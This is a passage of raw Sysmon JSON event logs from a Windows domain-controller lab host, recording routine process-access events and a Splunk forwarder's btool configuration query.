C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3057,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3058,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3059,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3060,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3061,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-0010D3470500}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-0010D3470500}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3062,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.770\r\nProcessGuid: {41C8662E-1FF2-5F25-0000-00108F480500}\r\nProcessId: 4404\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF2-5F25-0000-0010D3470500}\r\nParentProcessId: 4372\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.770","ProcessGuid":"{41C8662E-1FF2-5F25-0000-00108F480500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF2-5F25-0000-0010D3470500}","ParentProcessId":"4372","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3063,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1FF2-5F25-0000-0010D3470500}\r\nSourceProcessId: 4372\r\nSourceThreadId: 4380\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-00108F480500}\r\nTargetProcessId: 4404\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1FF2-5F25-0000-0010D3470500}","SourceProcessId":"4372","SourceThreadId":"4380","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-00108F480500}","TargetProcessId":"4404","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3064,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-00108F480500}\r\nTargetProcessId: 4404\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-00108F480500}","TargetProcessId":"4404","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3065,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 